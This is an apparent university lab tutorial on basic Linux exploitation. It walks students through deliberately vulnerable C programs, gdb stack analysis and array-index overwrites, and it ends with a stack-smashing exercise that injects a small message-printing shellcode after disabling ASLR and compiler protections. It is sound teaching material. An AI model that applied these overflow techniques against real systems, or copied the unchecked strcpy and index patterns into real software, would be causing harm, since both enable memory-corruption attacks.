If you can see this check that

Main Page


Introduction to Basic Exploits

User:
Password:

Authors: Rich Macfarlane, Gordon Russell

This gives an essential introduction to understanding basic Linux exploits, such as buffer overflow, range checking, and stack corruption. We will use some basic vulnerable C programs to explore memory mgt exploits. It also includes a short tutorial on shell code injection. This is all within kali using C++ and gdb, the linux debugger.

To reset all the check buttons from a previous attempt click here

Question 1: Basic C Program, GDB Debugger and Stack Memory Analysis

Create a file "overflow.c" in "/root" and add the following basic program code into the file:

#include <stdio.h>
#include <string.h>

int main() {
 // 5 byte buffer, which is 4 characters plus the null terminator
 char buff[5];

 // Copy 5 bytes to string buff
 strcpy(buff,"Rich"); 

 // print the string
 printf ("Hello %s\n",buff);
}

Compile this vulnerable C program with the gcc compiler:

gcc overflow.c -o overflow -g -fno-stack-protector -zexecstack -Wno-stringop-overflow
In order to make life simple, this compiles the code with the debugger enabled, and switches off some of the compiler memory security features which would otherwise make the example much more complex to perform.

The program "overflow" is then ready for executing. To make the program memory easier to analyse consistently in the debugger, switch the stack memory randomization protection off.

echo "0" > /proc/sys/kernel/randomize_va_space

Try running our overflow program normally.

./overflow

Tests - not attempted
Script overflow seems to work UNTESTED
Randomization disabled UNTESTED

Run the executable using the gdb debugger

gdb overflow
Use the "list" command to see the code. When you do this you only see the first few lines of the file. To see the next lines press "return" (pressing return on a blank line actually runs the last command you tried again, e.g. "list").

As you can see, the main (the only) routine here is called "main". Dissassemble the routine "main" (i.e. show the assembly code for this routine).

(gdb) disassemble main

This shows the code in a format like:

   0x0000000000400523 <+23>:    mov    %rax,%rsi
   0x0000000000400526 <+26>:    mov    $0x4005ec,%edi
   0x000000000040052b <+31>:    mov    $0x0,%eax
   0x0000000000400530 <+36>:    callq  0x4003e0 <printf@plt>
   0x0000000000400535 <+41>:    leaveq
   0x0000000000400536 <+42>:    retq
Ignoring the "0x000...:" part, what is the first instruction of "main". So in the case of the example above, it would be "mov %rax,%rsi". Dont include any unneeded spaces. First instruction:

Tests - not attempted
First instruction UNTESTED

While still in the debugger, list the program again. To start listing again from line 1 you may need the command "list 1".

Find the line with 'strcpy(buff,"Rich");', and set a breakpoint on that line. The command is "break" followed by the line number.

Now run the program using "run" in the debugger, and it should automatically stop running at the breakpoint. Once this is done try:

print buff
This should show you the contents of "buff", which contains random data as it has never been initialised. The address where "buff" lives in memory can be found by putting an ampersand in front of the variable:
print &buff
Execute the "strcpy" line using the command "next", which steps on to the next command (the printf). Now repeat the "print buff" command. It should now have the value "Rich".

Further investigate at this point using the following commands:

info reg rbp rsp
info frame
The stack frame holds the return address (Instruction Pointer) of the code which called the current function "main". This is in the "Saved registers" (the register values saved onto the stack current frame), and is called the "RIP". This is saved in the stack at a particular address as shown. The "buff" variable is also in the stack, as you discovered with the "print" command above.

Subtract the address of buff from the address where the Stored RIP is saved on the current stack frame ("rip at"), perhaps using another terminal window and the python interpreter as these are in Hex. How many bytes is between the addresses (answer in decimal)?

Tests - not attempted
Bytes to return address UNTESTED

Question 2: Stack Buffer Overflow

Now we fully understand our basic program, the gdb debugger, and our main function stack frame memory, we can look towards exploiting the vulnerable code, using a buffer overflow of the buff variable to overwrite the Stored RIP. Copy "overflow.c" to "overflow2.c". In "overflow2.c" change the string "Rich" to be a long string made of "A" characters. Try starting with the number of A character should be 4 plus the difference between the addresses you calculated in the previous question. So, if the difference was 10, you need 14 "A" characters, e.g.

  strcpy(buff,"AAAAAAAAAAAAAA");
This should cause a buffer overflow where the strcpy will overwrite the 4 low bytes of the rip with ascii A characters. It will also overwrite the next byte with 0x0, as the null in the null terminated string is also copied.

Once the changes are made, compile this code as before, except make the output "overflow2". Run the code. What error do you get?

Just write the error in lower case, and only include the error. So

zsh: divide by zero      ./overflow2
is simply "divide by zero".

Error:

Tests - not attempted
Error generated UNTESTED

Use the debugger on overflow2. Set a breakpoint on the strcpy command. Run the code. Once at the breakpoint, do

  info frame
Note the current VALUE of the "save rip". Now "next". Repeat the "info frame". What has happened to the "saved rip"?

Saved Rip least significant 5 bytes
So if the saved rip is 0x7f1122334455, the answer is 1122334455.

This is the end of the string, written backwards, where the hex of ASCII A appears 4 times, then the null.

Tests - not attempted
Overwritten rip UNTESTED

Question 3: Buffer Overflow - Stack Frame Memory Manipulation

Create a file "test1.cc" and put the following program into the file:

#include <stdio.h>
#include <stdlib.h>

int main(int argc,char **argv) {
 if (argc < 3) {
    printf ("Not enough parameters: enter item discount\n");
    exit(1);
 }
 int total=0;
 int items[4] = { 10,15,17,22 };
 int item=atoi(argv[1]);
 int discount=atoi(argv[2]);
 items[item]-=discount;
 for (int i=0; i<4; i++) {
   if (items[i] < 0) items[i] = 0;
   printf ("Charge id: %d, price %d\n",i,items[i]);
   total+=items[i];
 }
 printf ("Total: %d\n",total);
}

Compile this program with

g++ -g test1.cc

This represents a super simple example of a shopping basket with 4 items, where "items" holds the price of each of the 4 items in the basket. This code will calculate the total shopping basket price. But with this basket each customer is allowed a discount on one item in their basket, and that discount is allowed to be any value. OK it is not that realistic, but we need to keep the code simple.

The code takes 2 parameters. Parameter 1 is the index of the item to get the discount, and parameter 2 is the discount to be applied. It then adds up the total. So "./a.out 1 0" gives a 0 discount to item 1, "./a.out 1 5" gives a 5 pounds discount to item 1, "./a.out 3 10" gives a 10 pound discount to item 3.

Tests - not attempted
Script a.out seems to work UNTESTED

The code has some safety protection. For instance, "a.out 0 0" would give:

Charge id: 0, price 10
Charge id: 1, price 15
Charge id: 2, price 17
Charge id: 3, price 22
Total: 64
However "a.out 0 20" does not give id:0 for "-10" pounds. There is a safety check that forces all prices to be a minimum of zero.

If you were trying to get the best possible price by running this program, what is the lowest possible price you can get the parameters "0 100", "1 100", "2 100", or "3 100"?
Best price?:

Tests - not attempted
Script a.out seems to work UNTESTED
Best normal price UNTESTED

Note that there is no bounds check to make sure the first parameter is between 0 and 3. If you were to use larger index, then the program would exceed the limits of the array "items" and start to write things between its address and the top of the stack; an overflow of the items buffer. This would effectively allow us to corrupt the stack frame, and the contents of adjacent function data, and we can use this to change things we should not be able to change...

  • Run gdb (the debugger) on the a.out, e.g. "gdb a.out".
  • Find the line number using "list" in gdb which is "items[item]-=discount"
  • use that in "break lineno", so if the line is 15 do "break 15"
  • type "run 0 0" (run the a.out in gdb with parameters 0 0)
  • It should Breakpoint a the line you identified earlier
  • Do "print &items" (the address of items in memory)
  • print &total (the address of total in memory)
  • Subtract the address of items from the address of total

Bytes between variables:

Tests - not attempted
Script a.out seems to work UNTESTED
Address of items UNTESTED

Given that "items" is made up of 4 byte integers, each +1 to the index will increase the address by 4. What index of items would therefore refer to the contents of "total"?

Index of items for the contents of "total":

Tests - not attempted
Script a.out seems to work UNTESTED
Item index for total UNTESTED

Use this knowledge and run "a.out" with the first parameter being the index identified above, and the second parameter being a number which when subtracted from the running total would result in the total calculated price being 0.

What were the parameters of a.out to get a total of zero?
Parameter 1:
Parameter 2:

Tests - not attempted
Script a.out seems to work UNTESTED
Parameter 1 ok UNTESTED
Parameter 2 ok UNTESTED

Question 4: Buffer Overflow - More Memory Manipulation

Create a file "test2.cc" and save the following source code into the file.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char **argv) {
  if (argc < 2) {
    printf ("Not enough parameters: enter your reference code\n");
    printf ("Maximum of 7 characters in your code\n");
    exit(1);
  }
  int basket=550;
  char code[8];
  strcpy(code,argv[1]);
  printf ("Your ref: %s. The bill is %d\n",code,basket);
}
This program replicates the internals of a site which finalises your shopping cart bill. It is called with a user-defined reference which will appear on the bill, along with the basket total of 550 pounds.

Compile the program as before, and try running this new a.out with the a user-defined reference, such as "rich21".

Tests - not attempted
Script a.out seems to work UNTESTED

The user ref is only designed to have a max of 7 characters (plus a null character). If too much is stored in the code array it will overflow and end up overwriting the value of basket.

Slowly try increasing the size of the user reference parameter of a.out. For instance, try

./a.out gordx
./a.out gordxx
and so on.

At what length of string does the string start to interfere with the value of the basket? Remember there is a NULL at the end of the string when it is encoded into the computer, so add 1 to the string length you see.
overrun:

Tests - not attempted
Script a.out seems to work UNTESTED
Length correct UNTESTED

When the string only just overflows into the basket variable, the variables least significant bit is changed from its current value to that of the NULL character (hex 0x00). Thus the current value 0x226 has 0x02 in its second most significant place, and 0x26 in the least significant place. Writing 0x00 over the least significant place leaves 0x200, or 512 decimal.

Use this knowledge to find the shortest string possible which sets your bill when running a.out to be 55 pounds only.

In doing this you need to try different parameters for the user reference. Limit yourself to using either "x" where the character makes no difference to the price, or the actual character required to make the bill 55 pounds. An ASCII chart might help...

What is the user reference needed?
ref:

Tests - not attempted
Reference produces 55 pounds UNTESTED

If you wanted to set the basket to 12627 pounds, what would you need to use as the reference. Again use 'x' where it makes no difference, and the appropriate other characters to get to 12627. Use the minimum number of characters to do this.

What is the user reference needed?
ref:

Tests - not attempted
Reference produces 12627 pounds UNTESTED

Question 5: Buffer Overflow Exploit with a Payload

In this set of questions we are going to create a buffer overflow exploit, including redirection to run some basic payload code. Example adapted from https://www.soldierx.com/tutorials/Stack-Smashing-Modern-Linux-System

Create a trivial program vulnerable.c:

#include <string.h>
#include <stdio.h>

void go(char *data) {
    char name[64];
    printf("target: %p\n", name);  // Print address of buffer.
    strcpy(name, data);
}

int main(int argc, char **argv) {
    go(argv[1]);
}
All this does is ask for a parameter on the command line and copy it to a variable "name". It is again vulnerable code, which we can take advantage of via an overflow of the buffer. To make life easier, the programe also prints the address of the buffer to help us. In real life you might have to do a range of other things to work this out.

Compile the program with

gcc vulnerable.c -zexecstack -fno-stack-protector -g
Run the program several times with the same name as the input parameter:

./a.out rich

You should see the address of our name buffer change each time. This is due to the default Linux stack memory randomisation. For our experimentation we can switch this off:

echo "0" > /proc/sys/kernel/randomize_va_space
This switches off the default ASLR protection in Linux. It is much harder to create a stable exploit with randomised stack memory allocation... Run the program again to check the address of our name buffer is now stable.

Check the Program is Vulnerable

To check for a buffer overflow vunerability in the code, we can experimnet with sending large buffers as input to the program. Try sending 40, 60, and 80 "A"s instead of rich as the parameter.

./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

As expected the "name" buffer was overflowed and it seems like our Saved RIP, return instruction pointer was too! Out exploit seems possible.

Identify Location of Saved RIP on Stack Frame

To create our buffer overflow exploit, we first need to locate the return Instruction Pointer in our current Stack Frame, the Saved RIP of the calling function. We could do this by experimenting with our "A"s, or using unique strings, but as we have access to the code, we will use our previous method with the debugger and analysis of the stack memory.

Run a.out with the gdb debugger, use "list" and find the line with the vulnerable "strcpy" function on it, and set a breakpoint on that line. Now "run rich" (run the program with argv[1] set to "rich"). Find the address of "name" (which is the buffer we are going to overflow) and the adress of the "rip" saved instruction pointer for the calling function, using your now familiar gdb commands. Using the previous method, calculate the number of bytes between the "name" buffer and the return instruction pointer. What is that offset in decimal?
Bytes to saved instruction pointer:

Tests - not attempted
Randomisation disabled UNTESTED
Bytes to Saved RIP UNTESTED

To gain control of the program we now need to use our buffer overflow to overwrite the Saved RIP with the address of some payload code. We have a small payload of only 45 bytes, so we can inject that into the "name" buffer. If we then pad this input up to the Saved RIP, and overwrite it with the address of the buffer, we should be able to redirect execution to our playload code.

To create a working exploit we need to run the program in as similar a way as possible to when we actually add the exploit payload. The payload itself is 45 bytes long, but we will need to pad this out to the byte length between name and the return address on the stack (the distance between we found earlier). The address we will use to overwrite the current return address is 6 bytes long, so 6 plus the number of bytes from the name buffer to the Saved RIP gives you the total number of bytes we need to generate to precisely overwrite our Saved RIP.
Total number of chars/bytes in our buffer we need to create:
Number of chars/bytes in our buffer we need to pad between the payload and our new return address:

Build our Exploit Buffer

We need to now build our exploit buffer, which will contain the payload code, some padding to get to the Saved RIP location, and then our address of the payload code.

We can use perl to help us create the program input parameter used to overflow the name buffer. The following cmd will print 60 "A"s to std out:

perl -e 'print "A"x60'

Try running out programe and use perl to create the program input parameter "Rich":

./a.out `perl -e 'print "Rich"'` 

Now, lets run the program with the same size buffer we will need to overwrite the Saved RIP, and identify the address of the name buffer in those conditions. Remember, the code prints this out when it runs, to make our exploit writing easier... We can just use "A"s for the buffer just now. Run the program and send in the 78 byte buffer, using the following:

env - ./a.out `perl -e 'print "A"x78'`
This runs the executable without any environmental variables. These are variables which describe the execution environment, such as the PATH, but can change dynamically over time and as they are stored in the stack you might find the stack address change... Without this, small changes in the way you execute the program can change the address, and cause the exploit to fail.
Name buffer address:

Tests - not attempted
Address identified UNTESTED
Total buff bytes UNTESTED
Buff padding bytes UNTESTED

Rewrite that address into little endian, and put "\x" in front of each byte. So if you had 0x7fffffff1130, it would become \x30\x11\xff\xff\xff\x7f.
little endian target address:

Tests - not attempted
Address identified UNTESTED

Now lets build our exploit buffer, adding the payload code, the padding, and our new return address. The return address should point at the name buffer and our exploit payload. Change the return address \xff\xff\xff\xff\xff\xff at the end of the string to your little endian name buffer address calculated in the previous question.

env - ./a.out `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\
\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\
\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21"\
 . "A"x27 . "\xff\xff\xff\xff\xff\xff"'`
If the exploit succeeds, and the payload runs, it prints out a short msg beginning with "H". If the exploit fails, the Saved RIP address may have changed. This can be caused by the variable itself being pushed onto the stack before main ran. If so, look in the output for "target:" again, create your exploit buffer again using the new address.
printf ("H......");
What message gets printed by the payload (case, punctuation, and space sensitive)?
message:

Tests - not attempted
Name found UNTESTED

Analyse our Exploit Payload

Use gdb to run our program with the successful exploit buffer, and lets analyse it from the debugger. We can run with the perl generated input parameter using "gdb --args" instead of "env -" previously.

Use "list" and again set the breakpoint at the strcpy. Then just type "run". You might get a little screen corruption as the payload code is binary, but just hit return.

The payload is in the "data" parameter, which should be displayed. If not use "print data" to display the address and contents.

Disassemble the first 16 instructions of the shellcode. Use "x/16i data". What is the first instruction opcode?
Opcode 1:
Now use "x /45bx data" "x /45bc data" and view the shellcode as Hex and then ASCII characters. How many bytes into the payload does the string, which gets printed when this shellcode runs? Format it as a decimal number. You can confirm your own number by trying "x /5c data+10", where 10 is replaced with what you think the right answer is. If you can see the string starting there then you are right! You can reconfirm this using "x /1s data+10", which prints the first null terminated string it finds. Again replace 10 with the right answer.
String offset:

Tests - not attempted
Opcode 1 UNTESTED
String offset UNTESTED

Review the stack frame information with "info frame". Print out the stack frame memory from the name buffer up to and including the Saved RIP (the size of your exploit buffer) using the x command to show the memory in Hex and then ASCII.

Then run our program's next instruction, and review the stack frame again, and again review the stack memory 78 bytes starting at the name buffer. You should be able to identify our payload, the padding with "A"s, and the Saved RIP overwritten with our paylaod address.

Can you identify the Hex bytes which make up the message printed by our payload? Enter just the hex pairs, without the "0x" before. If the message was 'rich' the Hex would be "72696368".
Hex bytes of message:

Tests - not attempted
Hex of payload msg UNTESTED


Centos 7 intro: Paths | BasicShell | Search
Linux tutorials: intro1 intro2 wildcard permission pipe vi essential admin net SELinux1 SELinux2 fwall DNS diag Apache1 Apache2 log Mail
Caine 10.0: Essentials | Basic | Search | Acquisition | SysIntro | grep | MBR | GPT | FAT | NTFS | FRMeta | FRTools | Browser | Mock Exam |
Caine 13.0: Essentials | Basic | Search | Acquisition | SysIntro | grep | MBR | GPT | FAT | NTFS | FRMeta | FRTools | Browser | Mock Exam |
CPD: Cygwin | Paths | Files and head/tail | Find and regex | Sort | Log Analysis
Kali: 1a | 1b | 1c | 2 | 3 | 4a | 4b | 5 | 6 | 7a | 8a | 8b | 9 | 10 |
Kali 2020-4: 1a | 1b | 1c | 2 | 3 | 4a | 4b | 5 | 6 | 7 | 8a | 8b | 9 | 10 |
Useful: Quiz | Forums | Privacy Policy | Terms and Conditions

Linuxzoo created by Gordon Russell.
@ Copyright 2004-2024 Edinburgh Napier University